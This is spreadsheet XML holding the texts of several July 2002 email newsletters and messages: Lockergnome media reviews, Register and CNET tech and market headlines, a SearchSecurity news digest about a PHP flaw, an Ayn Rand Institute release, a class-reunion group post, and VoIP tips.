presence. Rexway rip through an opening set with enough energy to 
kick-start even the most somber crowd, moving everyone in the 
audience to their feet and setting the scene for an entertaining 
evening. As with most punk, the lyrics are equal parts politics 
and angst, with enough colorful language to drop a jaw or two. 
Tool fans should check out the countrified version of the classic 
HWAP; it's kind of like a cover tune, only more unique. If you 
are offended by 4-letter words, this band isn't for you. 
 Get the privacy of your own office without the promotion. 
Keep what you do on your PC private.
Hide windows instantly, clear cache, cookies, history &amp; more!
Get a virtual Panic Button for your PC!
Try it today!    
Â GnomePLUGIN
MEXP
For Winamp
http://www.mexp.dkIf you ever used Mp3 Archive with Winamp, you're already familiar with 
the concept behind this plug-in. Organize, search, and catalog your 
music collection. List artists in a tree view, complete with 
sub-headings for each song or album (depending on personal 
configuration). Additional details about your song listings appear in 
the right-hand pane. Also includes an Id3 tag editor, CDDB integration 
for simplifying tag edits, and Lyrics database support. Try it free for 
30-days, if you feel more organized, register MEXP for either 14-bucks 
or 14-Euros. 
Â GnomeDVD
Click for DetailsCroupier (NR) 1998
Drama - 94min
Reviewer's Tilt (9)Special DVD Features worth a look-Deleted scenesIn disembodied first person Clockwork style narration,  Croupier
pessimistically compares our lives to those of hapless casino gamblers.
We know the odds are stacked against us, yet we continue to play the
games. Gamblers, or "punters" as they are more derogatorily known,
however, play their games under the watchful eyes of the croupier
(casino dealer).  Constantly pulled by the siren song of fast money, the
croupier knows better than anyone that to play is to lose. Thus, the
cool croupier relegates himself to his addiction of watching others
lose. Jack Manfred (Clive Owen) is the croupier, raised by his croupier
father (Nicholas Ball) who taught him all the tricks of the trade.
Through his losses both in the casino and in his personal life, Jack's
father also taught Jack that the only way to win is not to play. Punters
are sorry sods; the croupier is king. From father to son, the lesson
passes -- watching others strive and falter is the only real enjoyment
in life. Despite decades of croupier training, Jack is compelled to
write the great novel burning deep inside him, yearning to escape.
Jack's publisher regrettably relates to Jack that his novel idea is
trite; stories of real life graft and corruption are what sell. When
Jack's father informs Jack of a casino opening in a small London Casino,
Jack snatches the opportunity to parlay his skill into a novel exposing
the seedy underbelly of London's casinos. Unfortunately, Jack's ex-cop
girlfriend sees the job hardening and irreparably changing Jack for the
worst. In an attempt to fool himself, Jack creates alter ego "Jake" to
bear the brunt of inequity, attempting to maintain Jack both morally and
physically unscathed. The absence of any clear delineation between the
personas becomes apparent when a lovely punter (Alex Kingston)
approaches Jack with a scheme to rob the casino. Jack slowly comes to
the realization that no one can have it both ways, either in the casino
or in life. You are either in the game, or you are not. Seasoned veteran
director Michael Hodges deftly crafts this tale around the subtle
talents of the ultra cool Clive Owen. Owen rules this drama, not with
flex and volume, but with glances and nods. Less is truly more, much
more, in this low budget escape from the unsatisfying blockbuster
suspense films of recent memory. Croupier proves that it is not a large
budget, but direction, dialogue and acting that drive the genre.
Region 1 Encoding (US and Canada only)
Format: Color, Widescreen Anamorphic, Closed Captioned
Sound: Dolby Digital 2.0 Stereo
Deleted ScenesReview by Brett TroutÂ GnomeWALLPAPER
Surgenate for WallPapers by MooShooPosted on 7/22/2002 12:35:00 AM  -- Â Â  [Download]
Â --Â [Zoom]
Â --Â [Visit WinCustomize]
http://www.lockergnome.com/issues/digitalmedia/20020722.html
Your subscribed e-mail address is: [qqqqqqqqqq-lg@spamassassin.taint.org] - To unsubscribe or change your delivery address, please visit the subscription management page. For further information, please refer to the GnomeCREDITS in the sidebar.
LOCKERGNOME
Â Geekathon 2002Â Latest Windows Daily
Â Latest Digital Media
Â Latest Tech Specialist
Â Latest Penguin Shell
Â Latest Apple Core
Â Latest Web Weekly
Â Latest Bits &amp; Bytes
Â Latest Audio ShowÂ The GnomeSHOPPERÂ Microsoft Office Tips
Â PC Productivity Tips
Â Cool Internet Tips
Â Windows 2000 Tips
Â Windows XP Tips
Â Top 50 Fun Sites
Â Must-Know Tech Terms
Â Top 50 Useful Sites
Â Top 75 Tech Sites
Â Top 50 PenguinCORE
Â Top 50 PenguinTWEAKS
Â Recommend Us!
Â Advertise With Us
Â High-Tech Job Search
Â Chat With Gnomies
Â Watch The Webcams
Â Computer Power UserÂ Submit Your Opinion
Â Read Past Issues
Â Download X-Setup
Â About Lockergnome
Â Our Privacy Policy
Â View More Options
Â Get Chris's BookÂ General Feedback
Â E-mail the Editor
Â Jake's BlogÂ Our XML / RSS Feed
Â Syndicate Our Tips
Â Link To LockergnomeCLICK HERE TO ZOOMÂ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GNOMEMUSICWebasters Protest With The BluesInternet radio stations will sing the blues...literally...over music royalty rates, which the operators say are...
VMAs On Their WayThis year's MTV Video Music Awards will be hosted by Saturday Night Live newsman Jimmy Fallon. Bruce Springsteen and...
Short List Prize's long ListBeck, the Neptunes and Metallica's Lars Ulrich are all up for this year's Shortlist Music Project. The boys from The...
Coldplay On Ice?If you're a Coldplay fan, you better not wait too long to buy their latest release, A Rush Of Blood To The Head...
Actor Says Rappers Should Rap, Not ActActor Samuel L. Jackson says he won't even look at a script that turns rap artists into movie stars. He calls the...
P. Diddy Sued By SongwritersSean "P. Diddy" Combs and his Bad Boy Entertainment are being sued by three songwriters who say they were never paid... Â 
GNOMECREDITSÂ©2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered at DNS Central.
Â Â Search Past Issues:
Â </t>
  </si>
  <si>
    <t xml:space="preserve">Today's Headlines from The Register
-----------------------------------    To unsubscribe from this daily news update, see the instructions at
    the end of this message.Software    Ex-Microserf Schmidt as govt cyberterror Cassandra
    Apocalypse soon
        http://www.theregister.co.uk/content/4/26317.html    Bruce Perens on Real's Open Source gambit
    Media Frenzy        http://www.theregister.co.uk/content/4/26314.html    Fingerprinting of UK school kids causes outcry
    Prison-style fingerprint checking technology replaces library cards, or What Big Brother did next
        http://www.theregister.co.uk/content/4/26305.html    MS planning to tackle leaked WinXP keys with SP1?
    Mass zeroing of corporate keys mooted
        http://www.theregister.co.uk/content/4/26301.htmlPersonal Hardware    Microsoft's Canary phone - the first pics
    What a Stinker!
        http://www.theregister.co.uk/content/54/26308.html    We hate our iPAQs
    Very long list of complaints
        http://www.theregister.co.uk/content/54/26304.htmlInternet    EU intros site, freephone service to solve citizens' problems
    Their internal market problems anyway. Yum...
        http://www.theregister.co.uk/content/6/26312.html    IETF puts weight behind Advanced Encryption Standard
    Improved secrecy and security, one TLA at a time
        http://www.theregister.co.uk/content/6/26311.html    Volunteer snoops coming to an ISP near you?
    Operation Cyber-TIPS        http://www.theregister.co.uk/content/6/26309.html    Tiscali to launch Excite across Europe
    Ssssshhhh, it's a secret
        http://www.theregister.co.uk/content/6/26302.htmlNet Security    Ex-Microserf Schmidt as govt cyberterror Cassandra
    Apocalypse soon
        http://www.theregister.co.uk/content/55/26317.html    Serious PHP vuln reported
    Worse on Sparc than Intel
        http://www.theregister.co.uk/content/55/26316.html    Symantec's SecurityFocus buyout met with pessimism
    Bug trackers fear BugTraq death
        http://www.theregister.co.uk/content/55/26315.html    IETF puts weight behind Advanced Encryption Standard
    Improved secrecy and security, one TLA at a time
        http://www.theregister.co.uk/content/55/26311.htmlBusiness    EDS rejects WorldCom accounting allegations
    'Unfounded'
        http://www.theregister.co.uk/content/7/26306.html    Hopes of PC market recovery dashed
    Dell close to overtaking HP in becalmed sector
        http://www.theregister.co.uk/content/7/26303.html    WorldCom dives for Chapter 11 cover
    No surprises there
        http://www.theregister.co.uk/content/7/26300.html    ARM plans to charge options against profits
    UK market's first 'we're not Enron, oh no sir' move
        http://www.theregister.co.uk/content/7/26299.htmlThe Register and its contents are copyright 2002 Situation Publishing.
All rights reserved.    Tel:     +44 (0)20 7499 2264.
    Fax:     +44 (0)20 7493 5922.
    E-Mail:  press.releases@theregister.co.ukTo unsubscribe from these daily updates, visit the following URL.  Make
sure that you enter exactly the same e-mail address as you used to join
this service.    http://list.theregister.co.uk/cgi-bin/unsub.cgi
</t>
  </si>
  <si>
    <t>CNET Investor Dispatch
Quote LookupEnter symbol:Â· Symbol Lookup
Quotes delayed 20+ minutes
â€¢ My Portfolio
â€¢ Broker Reports
â€¢ IPOs
â€¢ Splits
â€¢ Messages
Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 22, 2002 DJIA7784.58 Â -234.68
 NASDAQNA Â -36.50
 S&amp;P 500819.85 Â -27.90
 CNETÂ TECH897.37 Â -48.86Techs fall again with telecoms, Dow drops below 8K
The day after WorldCom Group filed for bankruptcy protection, telecom shares suffered and helped drag down the tech sector.BellSouth stock tumbled 18.07 percent after it missed Wall Street's earnings target and offered a worse-than-expected outlook.  With shares of SBC Communications, Qwest Communications International, Sprint and AT&amp;T also dropping, CNET's Tech index shed 48.86 points, or 5.3 percent, to 897.37. The tech-heavy Nasdaq composite index fell 36.5 points, or 2.77 percent, to 1,282.55.With a report raising questions about Citigroup and J.P. Morgan Chase &amp; Co.'s role in the Enron fiasco, broader markets lost ground as well. After a see-saw session, the Dow Jones industrials ended down 234.7 points, or 2.93 percent, to 7,784.5. The S&amp;P 500 slid 27.90 points, or 3.29 percent, to 819.85.
BellSouth posts lower second-quarter profits 
BellSouth Corp., the No. 3 U.S. local telephone company, on Monday posted lower second-quarter profits due to slack demand and turbulent economic conditions in North America and Latin America.BellSouth, the dominant local telephone company in nine Southeastern states from Kentucky to Florida, said net income fell to 16 cents a share from 47 cents a year earlier. BELLSOUTH CORP 22.61 -18.11% WorldCom, BellSouth news adds to telecom gloom 
WorldCom Inc.'s bankruptcy filing is only the latest in a long line of sad news for a slumping telecom industry grappling with soft demand, falling earnings and worries about accounting.And things are not likely to change any time soon, as signaled by BellSouth Corp.'s disappointing second-quarter earnings and downward revision to its full-year outlook, analysts and investors said on Monday.WORLDCOM INC-WORLDCOM TRCK STK 0.14 55.56% HP seeks Texas justice; Gateway dinged 
In separate court cases, a Florida jury dinged Gateway for sending phone calls to the wrong business, and a federal court in Houston issued an injunction barring Emachines from selling products that infringe on Hewlett-Packard patents.
A jury in Florida ruled last week that Gateway must pay $3.6 million for a typo in which it sent customers with a PC problem to an 800 number owned by Pensacola, Fla.-based Mo' Money Associates instead of the company's own complaint line, which had a similar number but with an 888 prefix.HEWLETT-PACKARD CO 12.00 -6.25% 
Also from CNET
Real-time stock quotes from CNET News.com Investor.30-day free trial!
Banc of America Securities stays with "buy" rating on Novellus Systems in note 7/22/02 
Analyst Mark FitzGerald expects the chip equipment maker to meet his revenue and earnings estimates of $225 million and 10 cents per share when it reports second-quarter results after the market close. He anticipates earnings guidance for the current quarter of 15-20 cents per share. The stock could move a bit higher, but FitzGerald believes better data from end markets is needed for a sustained rally. He also expects the firm to announce it will pay back $880 million in debt.NOVELLUS SYSTEMS 29.55 -0.81% 
Visit the Brokerage Center
Tyco CFO's tenure seen ending as confidence wanes 
Tyco International Ltd.'s earnings release on Tuesday may very well be the last for Chief Financial Officer Mark Swartz, whose tenure has been marred by his close association with the conglomerate's disgraced former chairman.
Named CFO in 1995, Swartz has been the chief defender of Tyco's accounting, which has drawn fire for being opaque and misleading. But perhaps more important, Swartz was a key adviser and architect in Dennis Kozlowski's decade-long acquisition binge to build Tyco into one of the world's largest manufacturing conglomerates.TYCO INTERNATIONAL 11.85 -5.12% 
Visit the CEO Wealth MeterDigital photography starter kitThis guide to digital photos will show you the best products to take your images from snap to finish.
        â€¢ Panasonic's littlest Lumix
        â€¢ Minolta"s 4-megapixel Dimage F100Most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isÂ qqqqqqqqqq-zdnet@spamassassin.taint.orgUnsubscribeÂ |Â Manage My SubscriptionsÂ |Â FAQÂ |Â Advertise
Please send any questions, comments, or concerns toÂ dispatchfeedback@news.com.
Price comparisons |
Product reviews |
Tech news |
Downloads |
All CNET services        Copyright 2002 CNET Networks, Inc. All rights reserved.          
.</t>
  </si>
  <si>
    <t xml:space="preserve">WorldCom woes lead to bankruptcyÂ Search
	                Â 
	                Â 
News.com
	                All CNETÂ Â Â Â 
	                The Web
                Â Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 22, 2002WorldCom woes lead to bankruptcyScripting flaw threatens Web serversCollabNet takes wing for online gamesRussian firm points out new Adobe flawBritish scientists finish Grid foundationApplied's science: Building tinier chipsÂ PerspectivesDo we need a national ID plan?
A White House proposal ignites a privacy firestorm.
Read Full Story
WorldCom woes lead to bankruptcyTelecommunications giant WorldCom files for bankruptcy, representing the largest such action in U.S. history, though it's hardly alone. The company says it will emerge stronger; customers may get caught holding a dead line.
July 22, 2002, 8:00 AM PT
 | Read Full Story Scripting flaw threatens Web serversA flaw found in newer versions of the PHP Web server scripting language could allow attackers to crash, and in some cases control, computers over the Internet, an open-source developer group announced Monday.
The vulnerability affects versions 4.2.0 and 4.2.1 of PHP, according to the PHP Group. The flaw compromises different computer architectures in different ways: Web servers running on Intel IA-32 hardware could crash, while other systems, including Sun Microsystems' Solaris, could allow the attacker to infiltrate the computer.
July 22, 2002, 11:30 AM PT
 | Read Full Story CollabNet takes wing for online gamesSoftware development site CollabNet announced Monday that it is working with Butterfly.net, an IBM-backed effort to create a supercomputing grid for hosting online games.
CollabNet will host the Butterfly Lab, an online environment that will allow developers to test games using a service modeled on the Butterfly approach. Butterfly will also use CollabBet's SourceCast Web application to enable game development teams to share source code, manage art assets and design games for the Butterfly service.
July 22, 2002, 11:55 AM PT | Read Full Story 
Russian firm points out new Adobe flawThumbing its nose at the company that landed one of its employees in jail, ElcomSoft is pointing out new flaws in Adobe Systems' eBook software.
The flaws could allow someone to check out every copy of every book in Adobe's new electronic library for an unlimited amount of time by changing the values in the loan form. However, the bugs were discovered on an Adobe test Web site that demonstrates how the software could be used to set up a lending library--not an actual site that offers books--and ElcomSoft gives information about how to fix the flaws.
July 22, 2002, 10:30 AM PT
 | Read Full Story British scientists finish Grid foundationBritish scientists on Monday announced the completion of one of the building blocks for large-scale data sharing over the Grid--a proposed network of computers seen as the 21st century successor to the Internet.
The project was carried out by scientists from the U.K.'s E-Science Centres and was co-funded by IBM and Oracle. The companies, rival powers in the database market, contributed both funding and the efforts of their own researchers.
July 22, 2002, 10:50 AM PT
 | Read Full Story Applied's science: Building tinier chipsApplied Materials is harnessing the atom to build better chips.
The manufacturer of chipmaking equipment said Monday that its latest product will incorporate a technique called atomic layer deposition, which creates chips atom by atom.
July 22, 2002, 9:10 AM PT
 | Read Full Story 
From our partners:Nvidia: Dodging a hail of bulletsBusiness Week
Can the chip wizard fight off rivals and the SEC?
July 29, 2002 issue
 | Read Full Story Sohu: So far, so good--sort ofBusiness Week
The Chinese portal should go easy celebrating its first quarterly profit. It still faces a chilling threat from Beijing's thought police.July 22, 2002
 | Read Full Story 
Also from CNET:Real-time stock quotes from CNET News.com Investor.30-day free trial!
Digicams for summer shutterbugsGoing on vacation, or just headed to the beach? Indulge your summer snapshot habit with one of our picks.
â€¢ 5-megapixel shoot-out
â€¢ Leica Digilux 1: street shooter"s digicamMost popular products
Digital cameras
1. Canon PowerShot G2
2. Canon PowerShot S40
3. Canon PowerShot S30
4. Canon PowerShot A40
5. Nikon Coolpix 995
 See all most popular cameras
Â Apple developers take center stage
At Macworld in New York, ZDNet Anchordesk Executive Editor David Coursey looks at the latest applications and hardware coming from Apple developers, including a new personal video recorder and back-up storage drive.
 Watch Video
Â Â EnterpriseGateway to unveil new ProfileGroove tightens ties to MicrosoftCheck Point's revenue plummetsE-BusinessMarkets tumble on earnings outlooksPayPal, Stamps.com seal dealBig chill for federal IT spendingCommunicationsSatellite phones getting taste of cellularWorldCom seeks OK to pay severanceBellSouth shares skid on earnings woesMediaReal takes the open source routeIs Internet radio doomed?Ogg Vorbis official release is herePersonal TechnologyHP seeks Texas justice; Gateway gets dingedLevel 3 to help power Xbox LiveLexmark earnings surprise Wall Street        Â 
The e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@spamassassin.taint.org
UnsubscribeÂ |Â Manage My SubscriptionsÂ |Â FAQÂ |Â AdvertisePlease send any questions, comments, or concerns toÂ dispatchfeedback@news.com.Price comparisons |
Product reviews |
Tech news |
Downloads |
All CNET services        Copyright 2002 CNET Networks, Inc. All rights reserved.          </t>
  </si>
  <si>
    <t>SEARCHSECURITY | Security and Industry News
July 23, 2002=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
FROM OUR SPONSOR:- FREE Security Webcast from Microsoft and NetIQ 
http://searchSecurity.com/r/0,,4619,00.htm?FreeSecurityWebcast =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=IN THIS ISSUE | Today's Highlights1. THE TOP STORIES 
- PHP flaw could crash, burn Web servers
- Quick Takes: Major vendors throw support at SAML
- NetBugtraq founder's security tips
- ROI calculators: Honest projection or fuzzy math?2. IMPORTANT ANNOUNCEMENTS AND LINKS
- New poll: Will heuristics ever fully replace signature-based
antivirus protection?
- Infosec Know IT All Daily Trivia: Tuesday, July 23, 2002
- Network Security Tip: Firewall best practices 
- Best Web Links: Risk analysis
- The Missing Link: Scot has cyber tomb with a view
____________________________________________________________________
*********************** SPONSORED BY: NetIQ **********************FREE Security Webcast from Microsoft and NetIQ 
Is your enterprise secure? Learn how to combat hackers during the
free 8/20/02 Webcast, "Computer Crime Forensics," Part II of the
"Defending the Enterprise" series. Tune in as security experts from
the FBI, Shell, Microsoft and NetIQ show you how to dig deep to trace
the steps of a hacker and preserve valuable evidence if you're ever
compromised. They'll also cover how to safeguard and harden your
Windows network during a live Q&amp;A session. Discover expert
countermeasures to secure and protect your enterprise. Register now! 
http://searchSecurity.com/r/0,,4619,00.htm?FreeSecurityWebcast ____________________________________________________________________
LEAD STORYPHP FLAW COULD CRASH, BURN WEB SERVERS | News: SearchSecurity
A security vulnerability in the popular PHP scripting language could
allow an attacker to crash a Web server or run arbitrary code on a
system. Only particular versions of PHP are impacted, and users are
urged to upgrade or patch immediately. 
http://www.searchsecurity.com/originalContent/0,289142,sid14_gci840432,00.html  MORE ON THIS TOPIC
&gt;&gt; Read the SearchSecurity news exclusive, "Open-source security:
It's all in the scrutiny:"
http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci811614,00.html &gt;&gt; Visit our Best Web Links on vulnerabilities:
http://searchsecurity.techtarget.com/bestWebLinks/0,289521,sid14_tax281934,00.html &gt;&gt; Click here for Top 10 Articles of the Week:
http://searchsecurity.techtarget.com/originalContent/0,289142,sid14_gci816475,00.html    
____________________________________________________________________
********************************************************************
OTHER STORIES
In addition to the headlines below, others are available on our news
page.
 &gt;&gt; Full Stories: http://searchsecurity.techtarget.com/news/
QUICK TAKES: MAJOR VENDORS THROW SUPPORT AT SAML | News:
SearchSecurity
RSA Security and CRM vendor ePeople announce support for the Security
Assertion Markup Language (SAML) specification, leading off this
edition of Quick Takes. Also included are items from Red Siren and
Veridian, ISS and St. Bernard Software, WatchGuard and Sigaba. 
http://www.searchsecurity.com/originalContent/0,289142,sid14_gci840356,00.html NETBUGTRAQ FOUNDER'S SECURITY TIPS | News: SearchWindowsManageability
What's wrong with Windows security? How can you right those wrongs?
Security expert Russ Cooper offers his insights and tips. 
http://searchwindowsmanageability.techtarget.com/originalContent/0,289142,sid33_gci839660,00.html  ROI CALCULATORS: HONEST PROJECTION OR FUZZY MATH? | News:
SearchEBusiness
Corporate budget watchdogs are breathing down your neck, wanting you
to justify every technology expense. So do ROI calculators accurately
forecast a project's likely returns or merely encourage you to open
up your wallet and spend?
http://searchebusiness.techtarget.com/originalContent/0,289142,sid19_gci839773,00.html =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
ADDITIONAL SECURITY HEADLINES
All headlines, including those below, are available on our news page.
 &gt;&gt; Full Stories: http://searchsecurity.techtarget.com/news/- WHAT DOES THE FUTURE HOLD FOR PGP?
- GAO FAULTS U.S. CYBER-SECURITY EFFORTS
- FIREWALL SAFEGUARDS WEB-ENABLED APPS
- SECURITY FLAWS IN PINGTEL PHONE____________________________________________________________________
IMPORTANT FEATURES AND LINKS:=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
TAKE OUR POLL | SearchSecurity reader surveyWill heuristics ever fully replace signature-based antivirus
protection?http://searchsecurity.techtarget.com/poll PREVIOUS POLL RESULTSWhat is the weakest security link in your organization?
People (138 votes) 92%
Technology (6 votes) 4%
Don't know (6 votes) 4%
Total votes: 150=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INFOSEC KNOW IT ALL DAILY TRIVIA | Tuesday, July 23, 2002 This type of IDS involves a wrapper or a scanner that looks for
specific events. When it sees the event, it correlates it and decides
whether or not it's an acceptable event.
a. anomaly detection
b. signature-based
c. blind barricade
d. profile detection&gt;&gt; Check your answer:
http://searchsecurity.techtarget.com/tip/1,289483,sid14_gci840086,00.html &gt;&gt; Visit our Featured Topic on intrusion detection:
http://searchsecurity.techtarget.com/featuredTopic/0,290042,sid14_gci779273,00.html =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
FIREWALL BEST PRACTICES | Network Security TipFirewalls are not the end-all, be-all solution to information
security. They are, however, a necessary component of an effective
information security infrastructure. The following list is a set of
best practices, in no particular order, that you should consider to
ensure that your firewall is configured for optimal performance and
effectiveness...
http://searchsecurity.techtarget.com/tip/1,289483,sid14_gci838215,00.html  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
RISK ANALYSIS | Best Web LinksKnowing where your company's security weaknesses are allow you to
prioritize and better allocate your resources. Learn more about risk
analysis from the resources we've collected here.
http://searchsecurity.techtarget.com/bestWebLinks/0,289521,sid14_tax281906,00.html  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
THE MISSING LINK | Scot has cyber tomb with a viewSometimes an epitaph just can't be the last word. Billy Kemp was a
great Scot who died a couple of years ago at the young age of 52. He
was a councilman, husband, father and pillar of his community. His
family couldn't possibly post all that on a tombstone. But they did
manage to fit http://www.billykemp.org.uk/ on there. Yep, Kemp's
tombstone doubles as a billboard for his Web site, created
posthumously by his son as a tribute to his father's life. The grave
site has gotten more than 33,000 hits, perhaps more visits than the
gravesite!SOURCE: vnunet
http://www.vnunet.com/News/1133759 
&gt;&gt; Have you missed a Missing Link? Peruse our archive: 
http://searchsecurity.techtarget.com/bestWebLinks/0,289521,sid14_tax292200,00.html____________________________________________________________________
********************** SEARCHSECURITY CONTACTS *********************CATHY GAGNE, Site Editor (mailto:cgagne@techtarget.com)
   &gt;&gt; Send in your original articles and best practices.
____________________________________________________________________CRYSTAL FERRARO, Assistant Editor (mailto:cferraro@techtarget.com)
   &gt;&gt; Send in your favorite Web sites.
____________________________________________________________________MIKE MIMOSO, News Editor (mailto:mmimoso@techtarget.com)
   &gt;&gt; Send in your news, product announcements and article ideas.
____________________________________________________________________ED HURLEY, Assistant News Editor (mailto:ehurley@techtarget.com)
   &gt;&gt; Send in your news, product announcements and article ideas.
____________________________________________________________________GABRIELLE DERUSSY (mailto:gderussy@techtarget.com)
   &gt;&gt; Sponsor this or any other TechTarget newsletter.
________________________________________________________________________________________________________________________________________
********************* ABOUT THIS NEWSLETTER ************************Created by TechTarget (http://www.techtarget.com)
 TechTarget - The Most Targeted IT Media
 Copyright 2002, All Rights Reserved.
Unsubscribe from 'Daily News'
 - Simply Reply to this Email with REMOVE within the Body or Subject
&gt;  or
 - Go to: http://searchSecurity.techtarget.com/register
 - Log in to edit your profile.
 - Click on the link to Edit email subscriptions.
 - Uncheck the box next to the newsletter you wish 
   to unsubscribe from.
 - When finished, click "Save Changes to My Profile."</t>
  </si>
  <si>
    <t>PRESS RELEASE FROM THE AYN RAND INSTITUTE
2121 Alton Parkway, Suite 250
Irvine CA 92606July 24, 2002
FOR IMMEDIATE RELEASEGOVERNMENT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###Ayn Rand Institute executive director Dr. Yaron Brook is available for
interviews on this topic.Contact: Larry Benson
E-mail: larryb@aynrand.org
Phone: (949) 222-6550 ext. 213Read Dr. Brook's full Op-Ed at:
http://www.aynrand.org/medialink/killingthestockmarket.shtmlFor more information on ARI's unique point of view go to Medialink at the
Institute's Web site at www.aynrand.org. Founded in 1985, the Ayn Rand
Institute promotes the philosophy of Ayn Rand, author of Atlas Shrugged and
The Fountainhead.If you wish to have your email gazette@vineyard.net REMOVED from this list,
please send an email to davidh@aynrand.org with the email address to be
removed. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Everyone,
There seem to be several "boneheads" in our class. A few months ago I 
ran into John Dahill, he asked me if I would go to the reunion picnic 
with him. His girlfriend and my guyfriend wouldn't know anyone there, 
so I said yes. Yesterday he told me he can't go!! All this time he 
thought it was on Saturday!! Oh well, I will see everyone there 
sometime through the afternoon.
Wendy Downs
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Free $5 Love Reading
Risk Free!
http://us.click.yahoo.com/NsdPZD/PfREAA/Ey.GAA/vUjolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
GHSclassof1977-unsubscribe@yahoogroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
SEARCHNETWORKING | Voice over IP Tip
July 25, 2002
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
FROM OUR SPONSOR:
Looking for RISK FREE VoIP?
http://searchNetworking.com/r/0,,4689,00.htm?quintum
________________________________________________________________ 
IN THIS ISSUE | Table of Contents 1. VOIP TIPS 
   - Troubleshooting voice
   - VoIP enable your telephony
   - Understanding delay2. IMPORTANT ANNOUNCEMENTS AND LINKS
   - Network management/VoIP/wireless strategies revealed
   - SearchNetworking Webcast archives 
   - Featured Topic: Networks of the future
   - Expert response: Ted Studwell answers your questions
   - Featured book: Microsoft encyclopedia of networking
____________________________________________________________________
***********************&gt;&gt; SPONSORED BY QUINTUM &lt;&lt;*******************
LOOKING FOR RISK FREE VoIP?
Get a RISK FREE VoIP solution that is easy to install and
cost-effective. Quintum Tenor(R) MultiPath Switches assure voice QoS.
PATENTED SelectNet provides real-time MID-CALL failover from IP to
public switched phone network. PacketSaver voice compression reduces
bandwidth use 50%.  NATAccess works behind NAT-enabled firewalls. 2
port SOHOs to carrier solutions at:
http://searchNetworking.com/r/0,,4689,00.htm?quintum=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
TROUBLESHOOTING VOICE | By Tom LancasterWhen you're troubleshooting voice calls, particularly the signaling,
it's often helpful to look at the detailed output of the device, be
it a voice-enabled router, telephony server, gateway or whatever. 
This detailed output can be in the form of logs or debug output as is
the case in Cisco's IOS.  In any case, this output is likely to be
somewhat cryptic.  One of the reasons is because this output often
uses a set of standardized codes and it is simply easier to put more
information on the screen using a short number than it is to write an
essay about why some event happened.Read the entire tip at: 
http://www.searchNetworking.com/tip/1,289483,sid7_gci840618,00.html
Got a VoIP tip of your own? Why not send it in? We'll post it on our
Web site, and we'll enter you in our tips contest for some neat
prizes.   Submit your tip here:
http://searchnetworking.techtarget.com/tipsSubmit/1,289485,sid7,00.htmlLike this tip?  Hate it?  Email us at
mailto:tips@searchnetworking.com=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
VoIP ENABLE YOUR TELEPHONY | By Tom LancasterOne of the reasons VoIP has been slowly gaining traction is that
large enterprises have quite a lot of legacy equipment, and migrating
to VoIP from the circuit-switched networks of yore is no easy feat.
These environments are typically complicated and the stakes are high
because so many mission-critical systems rely on telephony.Click here for the full tip:
http://searchnetworking.techtarget.com/tip/1,289483,sid7_gci779073,00.html=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
UNDERSTANDING RELAY | By Tom LancasterEveryone knows that delay is one of the two primary causes of poor
voice quality, particularly in VoIP networks, but where does this
delay come from?  Delay is generally defined as the time it takes
from the instant you speak into the phone until the instant that
sound is regenerated on the far end. Quite a few things have to
happen to transport this sound through the system, so delay actually
has many components.Read the entire tip here:
http://searchnetworking.techtarget.com/tip/1,289483,sid7_gci823706,00.html___________________________________________________________________ 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
::::::::::  DON'T MISS THESE IMPORTANT MESSAGES AND LINKS  ::::::::
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
NETWORK MANAGEMENT/VoIP/WIRELESS STRATEGIES | SearchNetworkingSearchNetworking.com hosts the Networking Decisions conference in
Chicago, October 16-18. Sessions focus not only on essential network
management strategies, but feature critical insight on VoIP and
wireless. You find out how to best prepare for these technologies now
so you won't get left behind, the benefits to gain/pitfalls to avoid,
plus the real ROI for your organization.Get the full story right here: http://www.networkingdecisions.com=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
WEBCAST ARCHIVES | SearchNetworkingIf you missed the original airing of our Webcast on the best
practices for availability and performance management with Jon
